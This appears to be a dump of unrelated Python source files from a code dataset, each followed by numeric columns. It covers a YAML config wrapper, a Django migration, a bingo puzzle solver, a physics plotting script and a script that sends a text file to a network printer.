        """Create a fresh learner with a random initial state and target set.

        Initial mastery per node is a random int in [-3, 0) minus a small
        index-dependent offset. The target is a random subset of node
        indices of size between 3 and the node count.

        NOTE(review): ``random_state.choice`` may draw duplicates, so the
        target set can be smaller than the drawn size; the new Learner is
        also created without a seed. Confirm both are intended.
        """
        knowledge = self.knowledge_structure.nodes
        return Learner(
            [self.random_state.randint(-3, 0) - (0.1 * i) for i, _ in enumerate(knowledge)],
            self.knowledge_structure,
            set(self.random_state.choice(len(knowledge), self.random_state.randint(3, len(knowledge)))),
        )
| 3,164 | 955 |
# coding=utf-8
"""
Class for YAML-based (roundtrip) configurations
This is a mutable configuration that keeps track of both structure and comments, and allows you to add comments
in certain circumstances as well.
To make use of this, make sure you use the `fmt` argument of the `get_config()` function in the storage manager. For
example:
>>> manager = ultros.storage_manager
>>> config_obj = manager.get_config("test.yml", fmt="yaml-roundtrip")
>>>
"""
from typing import Any, List, Dict
from ruamel import yaml
from ruamel.yaml.comments import CommentedMap, NoComment
from ultros.core.storage import manager as m
from ultros.core.storage.base import MutableAbstractDictFunctionsMixin, MutableAbstractItemAccessMixin
from ultros.core.storage.config.base import MutableConfigFile
__author__ = "Gareth Coles"
class YAMLRoundtripConfig(MutableConfigFile, MutableAbstractItemAccessMixin, MutableAbstractDictFunctionsMixin):
    """
    Class for YAML-based (roundtrip) configurations

    All state lives in ``self.data``, a ruamel ``CommentedMap`` that preserves
    YAML comments and ordering; most methods are thin wrappers around it.
    """

    def __init__(self, owner: Any, manager: "m.StorageManager", path: str, *args: List[Any], **kwargs: Dict[Any, Any]):
        # Start with an empty map; the base class is expected to trigger load().
        self.data = CommentedMap()
        super().__init__(owner, manager, path, *args, **kwargs)

    def load(self):
        """Parse the YAML file at ``self.path`` into ``self.data`` (YAML 1.2)."""
        with open(self.path, "r") as fh:
            self.data = yaml.round_trip_load(fh, version=(1, 2))

    def reload(self):
        """Discard in-memory data and re-read the file from disk."""
        self.unload()
        self.load()

    def unload(self):
        """Drop all in-memory data (comments/structure included)."""
        self.data.clear()

    def save(self):
        """Write ``self.data`` back to disk, preserving comments/ordering.

        Raises RuntimeError for immutable (defaults) files.
        """
        if not self.mutable:
            raise RuntimeError("You may not modify a defaults file at runtime - check the mutable attribute!")
        with open(self.path, "w") as fh:
            yaml.round_trip_dump(self.data, fh)

    # region: CommentedMap functions

    def insert(self, pos, key, value, *, comment=None):
        """
        Insert a `key: value` pair at the given position, attaching a comment if provided

        Wrapper for `CommentedMap.insert()`
        """
        return self.data.insert(pos, key, value, comment)

    def add_eol_comment(self, comment, *, key=NoComment, column=30):
        """
        Add an end-of-line comment for a key at a particular column (30 by default)

        Wrapper for `CommentedMap.yaml_add_eol_comment()`
        """
        # Setting the column to None as the API actually defaults to will raise an exception, so we have to
        # specify one unfortunately
        return self.data.yaml_add_eol_comment(comment, key=key, column=column)

    def set_comment_before_key(self, key, comment, *, indent=0):
        """
        Set a comment before a given key

        Wrapper for `CommentedMap.yaml_set_comment_before_after_key()`
        """
        return self.data.yaml_set_comment_before_after_key(
            key, before=comment, indent=indent, after=None, after_indent=None
        )

    def set_start_comment(self, comment, indent=0):
        """
        Set the starting comment

        Wrapper for `CommentedMap.yaml_set_start_comment()`
        """
        return self.data.yaml_set_start_comment(comment, indent=indent)

    # endregion

    # region: Dict functions

    def clear(self):
        """Remove all keys. Wrapper for `dict.clear()`."""
        return self.data.clear()

    def copy(self):
        """Return a shallow copy of the underlying map. Wrapper for `dict.copy()`."""
        return self.data.copy()

    def get(self, key, default=None):
        """Return the value for `key`, or `default` if absent. Wrapper for `dict.get()`."""
        return self.data.get(key, default)

    def items(self):
        """Wrapper for `dict.items()`."""
        return self.data.items()

    def keys(self):
        """Wrapper for `dict.keys()`."""
        return self.data.keys()

    def pop(self, key, default=None):
        """Remove `key` and return its value, or `default` if absent. Wrapper for `dict.pop()`."""
        return self.data.pop(key, default)

    def popitem(self):
        """Remove and return a `(key, value)` pair. Wrapper for `dict.popitem()`."""
        return self.data.popitem()

    def setdefault(self, key, default=None):
        """Insert `key` with `default` if absent; return the stored value.

        Implemented manually (rather than delegating) so the insertion goes
        through the CommentedMap's own `__setitem__`.
        """
        if key not in self.data:
            self.data[key] = default
            return default
        return self.data[key]

    def update(self, other):
        """Merge `other` into the map. Wrapper for `dict.update()`."""
        return self.data.update(other)

    def values(self):
        """Wrapper for `dict.values()`."""
        return self.data.values()

    # endregion

    # Item access functions

    def __contains__(self, key):
        """
        Wrapper for `dict.__contains__()`
        """
        return self.data.__contains__(key)

    def __delitem__(self, key):
        """
        Wrapper for `dict.__delitem__()`
        """
        del self.data[key]

    def __getitem__(self, key):
        """
        Wrapper for `dict.__getitem__()`
        """
        return self.data.__getitem__(key)

    def __iter__(self):
        """
        Wrapper for `dict.__iter__()`
        """
        return self.data.__iter__()

    def __len__(self):
        """
        Wrapper for `dict.__len__()`
        """
        return self.data.__len__()

    def __setitem__(self, key, value):
        """
        Wrapper for `dict.__setitem__()`
        """
        return self.data.__setitem__(key, value)
| 4,727 | 1,428 |
from .autoencoder.models import AE_Conv4_FC3, AE_Conv5_FC3
from .cnn.models import Conv4_FC3, Conv5_FC3, Stride_Conv5_FC3, resnet18
from .cnn.random import RandomArchitecture
from .vae.vanilla_vae import (
Vanilla3DdenseVAE,
Vanilla3DVAE,
VanillaDenseVAE,
VanillaSpatialVAE,
)
| 293 | 130 |
# Generated by Django 2.2.15 on 2020-10-05 07:34
from django.db import migrations, models
class Migration(migrations.Migration):
    """Drop Profile.nickname; add Profile.displayname and Profile.trainee_type.

    NOTE(review): data held in the old `nickname` column is not copied into
    `displayname` — `RemoveField` simply discards it. Confirm that is the
    intended behavior before running in production.
    """
    # Must be applied after the previous 'account' migration.
    dependencies = [
        ('account', '0005_auto_20180411_2311'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='profile',
            name='nickname',
        ),
        # Optional display name (help_text/verbose_name are Chinese UI strings,
        # kept verbatim: "display name").
        migrations.AddField(
            model_name='profile',
            name='displayname',
            field=models.CharField(blank=True, help_text='显示姓名', max_length=32, null=True, verbose_name='显示姓名'),
        ),
        # Trainee role enum: 0=intern doctor, 1=resident, 2=visiting trainee.
        migrations.AddField(
            model_name='profile',
            name='trainee_type',
            field=models.IntegerField(choices=[(0, '实习医生'), (1, '住院医师'), (2, '进修医生')], default=0, help_text='学员身份', verbose_name='学员身份'),
        ),
    ]
| 804 | 305 |
import re
def mark(number, board):
    """Mark every cell of *board* whose value equals *number*.

    A board is a grid of [value, marked] cells; cells are mutated in place.
    """
    for line in board:
        for cell in line:
            if cell[0] == number:
                cell[1] = True
def check(board):
    """Return True when any full row or full column of *board* is marked."""
    # Rows: every cell's marked flag must be set.
    for line in board:
        if all(cell[1] for cell in line):
            return True
    # Columns: same index-based scan as rows (board is assumed square).
    size = len(board)
    for col in range(size):
        if all(board[row][col][1] for row in range(size)):
            return True
    return False
def sumUnmarked(board):
    """Return the sum of all numbers on *board* that are not marked."""
    total = 0
    for line in board:
        for value, marked in line:
            if not marked:
                total += value
    return total
def solve(path='4.input'):
    """Play bingo (Advent of Code 2021, day 4) with the input at *path*.

    The file holds a comma-separated list of drawn numbers on the first
    line, then blank-line-separated 5x5 boards. Numbers are drawn in order
    and marked on every board; as soon as a board has a fully-marked row or
    column, the product of its unmarked sum and the winning number is
    printed and returned.

    :param path: input file path (defaults to '4.input' as before)
    :return: the winning score, or None when no board ever wins
    """
    with open(path) as input_file:
        lines = input_file.readlines()
    numbers = map(int, lines[0].split(','))
    boards = []
    board_lines = []
    for line in lines[2:]:
        # A blank line separates consecutive boards.
        if not line.strip():
            if board_lines:
                boards.append(board_lines)
            board_lines = []
            continue
        # split() handles any field width, unlike the original fixed
        # two-character slices, and copes with varying whitespace.
        board_lines.append([[value, False] for value in map(int, line.split())])
    if board_lines:  # guard: avoid appending an empty board on a trailing blank
        boards.append(board_lines)
    for number in numbers:
        for board in boards:
            mark(number, board)
            if check(board):
                # Score = sum of unmarked numbers times the number just called.
                score = sumUnmarked(board) * number
                print(score)
                return score
    return None
# Run the solver only when executed as a script, not when imported.
if __name__ == '__main__':
    solve()
| 1,492 | 426 |
# from sanic_restful import reqparse, Resource
# from scheduler_service.api import mongo_db
# url_parse = reqparse.RequestParser()
# url_parse.add_argument("name") | 165 | 52 |
#!/usr/bin/env python
# © 2022. Triad National Security, LLC. All rights reserved. This
# program was produced under U.S. Government contract
# 89233218CNA000001 for Los Alamos National Laboratory (LANL), which
# is operated by Triad National Security, LLC for the U.S. Department
# of Energy/National Nuclear Security Administration. All rights in
# the program are reserved by Triad National Security, LLC, and the
# U.S. Department of Energy/National Nuclear Security
# Administration. The Government is granted for itself and others
# acting on its behalf a nonexclusive, paid-up, irrevocable worldwide
# license in this material to reproduce, prepare derivative works,
# distribute copies to the public, perform publicly and display
# publicly, and to permit others to do so.
import sys
import numpy as np
import matplotlib as mpl
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import glob
import argparse
from parthenon_tools import phdf
# Boosted diffusion solution for given frame 3-velocity and opacity
# initial time and position in boosted frame are t0p and x0p
# x and t are position in time in the observer frame, returns J at
# these position
def BoostedDiffusion(kappa, x0p, v, t0p, J0, x, t):
    """Analytic diffusion solution boosted by 3-velocity *v*.

    Transforms the observer-frame point (t, x) into the comoving (primed)
    frame and evaluates a Gaussian diffusion profile of opacity *kappa*
    that started at (t0p, x0p) with height *J0*.
    """
    lorentz = 1.0 / np.sqrt(1.0 - v * v)
    t_prime = lorentz * (t - v * x)
    x_prime = lorentz * (x - v * t)
    envelope = np.exp(-3.0 * kappa * (x_prime - x0p) ** 2 / (4.0 * t_prime))
    return J0 * np.sqrt(t0p / t_prime) * envelope
def _parse_bool(text):
    """Parse a command-line boolean.

    argparse's `type=bool` is a known trap: bool('False') is True because
    any non-empty string is truthy, so `--savefig False` used to enable the
    flag.  Accept the common false spellings instead.
    """
    if isinstance(text, bool):
        return text
    return text.strip().lower() not in ('false', '0', 'no', '')

parser = argparse.ArgumentParser(description='Plot a boosted diffusion wave.')
parser.add_argument('-f', '--files', dest='files', nargs='*', default='rad_adv*.phdf', help='List of input Parthenon hdf files to plot')
parser.add_argument('-o', '--out', dest='out_file', default='rad_adv_J.pdf', help='Plot output file')
# Set the parameters defining the initial conditions
# Defaults should be consistent with inputs/radiation_advection.pin
parser.add_argument('-v', dest='v', default=0.3, action="store", type=float)
parser.add_argument('-k', '--kappa', dest='kappa', default=1e3, action="store", type=float,
                    help='Background opacity in comoving frame')
parser.add_argument('-s', '--sigma', dest='sigma', default=0.03333, action="store", type=float,
                    help='Initial spread of gaussian pulse in comoving frame')
parser.add_argument('--J0', dest='J0', default=1.0, action="store", type=float,
                    help='Height of pulse at t=t0 in comoving frame')
parser.add_argument('--savefig', type=_parse_bool, default=True, help='Whether to save figure')
parser.add_argument('--analytic', type=_parse_bool, default=True, help='Whether to include analytic boosted diffusion in plot')
args = parser.parse_args()
# Unpack the command-line physics parameters.
v = args.v
kappa = args.kappa
sigma = args.sigma
J0 = args.J0
# Calculate the initial time in the primed frame based on the initial spread
# since at t=0 J \propto \delta(x)
t0p = 3/2*kappa*sigma**2
# Initial time in the observer frame is defined to be equal to the initial
# time in the co-moving frame
t0 = t0p
# Get the central position of the gaussian in the observer frame at t0
# (0.5 is the pulse center in the comoving frame; boosted by v over time t0)
x0p = (0.5 - v*t0)/np.sqrt(1-v*v)
# Lorentz factor
W = 1/np.sqrt(1-v*v)
# Read in the files: expand each glob pattern, then sort for a stable
# time ordering of the snapshots.
files = []
for file in args.files:
    files += glob.glob(file)
files = sorted(files)
# Set up unit conversions from the first dump's parameters
# (code units -> CGS; see 'phoebus/*CodeToCGS' in the output Params).
file0 = phdf.phdf(files[0])
L_unit = file0.Params['phoebus/LengthCodeToCGS']
T_unit = file0.Params['phoebus/TimeCodeToCGS']
M_unit = file0.Params['phoebus/MassCodeToCGS']
# If all three conversions are 1, the run is scale-free (arbitrary units).
scale_free = True
if not np.isclose(L_unit, 1.) or not np.isclose(T_unit, 1.) or not np.isclose(M_unit, 1.):
    scale_free = False
# Derived units: energy and energy density.
E_unit = M_unit*L_unit**2/T_unit**2
UE_unit = E_unit / L_unit**3
J0 *= UE_unit
# Find the minimum and maximum times of the data
minTime = sys.float_info.max
maxTime = -sys.float_info.max
for file in files:
    dfile = phdf.phdf(file)
    minTime = min([dfile.Time, minTime])
    maxTime = max([dfile.Time, maxTime])
# Avoid a zero-width color range when all snapshots share one time.
maxTime = max([maxTime, minTime + 0.01])
# Set up the axes with a time colorbar (color encodes snapshot time).
cmap = cm.get_cmap('viridis')
fig = plt.figure(figsize=[20,8])
plt_ax = fig.add_axes([0.15, 0.15, 0.68, 0.8])
c_map_ax = fig.add_axes([0.86, 0.2, 0.03, 0.7])
mpl.colorbar.ColorbarBase(c_map_ax, cmap=cmap,
                          norm=mpl.colors.Normalize(minTime, maxTime),
                          orientation = 'vertical',
                          label='Time')
# Plot the data (should work for refinement, but untested)
# Choose the species and y and z locations
# ispec currently has to be fixed to 0 because of tensor issues in Parthenon output
ispec = 0
iz = 0
iy = 0
for file in files[0::1]:
    dfile = phdf.phdf(file)
    J = dfile.Get("r.p.J", flatten=False)*UE_unit
    x = dfile.x*L_unit
    t = dfile.Time
    if (t>maxTime): continue
    color = cmap((t - minTime)/(maxTime - minTime))
    for block in range(dfile.NumBlocks):
        plt_ax.plot(x[block, :], J[block, iz, iy, :, ispec], color=color)
    xmin = np.amin(x)
    xmax = np.amax(x)
    xgrid = np.arange(xmin, xmax, (xmax-xmin)/1000)
    if args.analytic:
        # Overlay the analytic boosted-diffusion solution at this output time
        # (dashed black); x is converted back to code units for the formula.
        plt_ax.plot(xgrid, BoostedDiffusion(kappa, x0p, v, t0p, J0, xgrid/L_unit, t + t0p), linestyle='--', color='k')
# Axis limits: start at the boost distance, end at the domain edge.
xl = v*L_unit # 0.3
xh = 1.0*L_unit
yl = -0.1
yh = 1.05*J0
if scale_free:
    plt_ax.set_ylabel('J (arb. units)')
    plt_ax.set_xlabel('x (arb. units)')
else:
    plt_ax.set_ylabel('J (erg cm^-3)')
    plt_ax.set_xlabel('x (cm)')
plt_ax.set_xlim([xl, xh])
plt_ax.set_ylim([yl, yh])
# Unnormalized total of J over the first block of the last file plotted.
etot = sum(J[0, iz, iy, :, ispec])
print("etot: ", etot)
# Raw string so '\kappa' reaches matplotlib's mathtext intact instead of
# relying on '\k' being an unrecognized (deprecated) escape sequence.
plt_ax.text(0.05*(xh-xl)+xl, 0.95*(yh-yl)+yl, r'$\kappa={}$'.format(kappa))
if args.savefig:
    plt.savefig(args.out_file)
else:
    plt.show()
| 5,509 | 2,074 |
"""
Konfigurace Django aplikace admin.
"""
from django.apps import AppConfig
class AdminConfig(AppConfig):
    """Django application configuration for the "admin" app."""
    # Python-path label of the app.
    name = "admin"
    # Human-readable name shown in Django's UI (Czech branding, kept verbatim).
    verbose_name = "ÚPadmin"
| 157 | 54 |
# Import libraries BrotherPrint and socket
from brotherprint import BrotherPrint
import socket
# Establish socket connection to the printer.
f_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f_socket.connect(("172.16.133.157", 9100)) # Supply IP address of printer and port (default 9100)
printjob = BrotherPrint(f_socket) # Create a print job
# Editing the print job: enter command mode, reset state, enable bold.
printjob.command_mode()
printjob.initialize()
printjob.bold('on')
#printjob.send("Printed from Python program") # Pass string that needs to be printed
#printjob.print_page("full") # Print mode. Options: 'full', 'half', 'special' etc.
# To print from a file; `with` guarantees the handle is closed even on a
# read error (the original left the file open).
with open('/home/student/Desktop/print.txt', 'r') as text_file:
    text = text_file.read()
printjob.send(text)
printjob.print_page("full")
# Release the printer connection once the job has been sent.
f_socket.close()